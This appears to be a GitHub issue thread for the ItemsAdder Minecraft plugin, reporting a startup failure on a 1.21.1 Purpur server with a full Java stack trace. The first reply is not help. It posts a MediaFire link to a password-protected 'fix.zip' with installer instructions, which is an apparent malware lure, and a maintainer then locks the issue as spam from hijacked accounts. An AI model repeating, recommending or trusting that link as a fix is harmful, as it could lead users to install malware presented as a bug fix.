### ISSUE TITLE
1.21.1 Not working properly

### ISSUE THREAD

**Issue by aml2023529** [PluginBugs/Issues-ItemsAdder#3924]
### Terms

- [X] I'm using the very latest version of ItemsAdder and its dependencies.
- [X] I am sure this is a bug and it is not caused by a misconfiguration or by another plugin.
- [X] I've looked for already existing issues on the [Issue Tracker](https://github.com/PluginBugs/Issues-ItemsAdder/issues) and haven't found any.
- [X] I already searched on the [plugin wiki](https://itemsadder.devs.beer/) to know if a solution is already known.
- [X] I already searched on the [forums](https://forum.devs.beer/) to check if anyone already has a solution for this.
- [X] I tested this with just ItemsAdder and its dependencies and with a vanilla client of the same version as the Server.

### Discord Username (optional)

liangys233

### What happened?

[23:22:05 ERROR]: [ItemsAdder] Failed to find nms implementation for: interface ia.m.iV
[23:22:05 ERROR]: Error occurred while enabling ItemsAdder v4.0.2-alpha-test-6 (Is it up to date?)
java.lang.RuntimeException: null
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iH.a(SourceFile:151) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iH.a(SourceFile:49) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iH.l(SourceFile:40) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iS.<init>(SourceFile:42) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iS.jJ(SourceFile:66) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iS.jI(SourceFile:60) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.cD.<init>(SourceFile:53) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.cD.fn(SourceFile:44) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.t(SourceFile:476) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.a(SourceFile:500) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.<init>(SourceFile:277) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.a(SourceFile:297) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/dev.lone.itemsadder.Main.onEnable(SourceFile:387) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:288) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:202) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:109) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:520) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at org.bukkit.craftbukkit.CraftServer.enablePlugin(CraftServer.java:654) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at org.bukkit.craftbukkit.CraftServer.enablePlugins(CraftServer.java:603) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:758) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:520) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:366) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1231) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:334) ~[purpur-1.21.1.jar:1.21.1-2297-ef12ede]
        at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]

### Steps to reproduce the issue

1.21.1 Not working properly

### Server version

1.21.1

### ItemsAdder Version

4.0.2-alpha-test-6

### ProtocolLib Version

> version ProtocolLib
[23:26:23 INFO]: ProtocolLib version 5.3.0-SNAPSHOT-726
[23:26:23 INFO]: Provides read/write access to the Minecraft protocol.
[23:26:23 INFO]: Authors: dmulloy2 and comphenix

### LoneLibs Version

1.0.57

### Full Server Log

1

### Problematic items yml configuration file (optional)

```yaml
1
```

### Other files, you can drag and drop them here to upload. (optional)

1

### Screenshots/Videos (you can drag and drop files or paste links)

1

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Andre601** [comment]
Locking the issue to prevent spam comments from hijacked accounts.
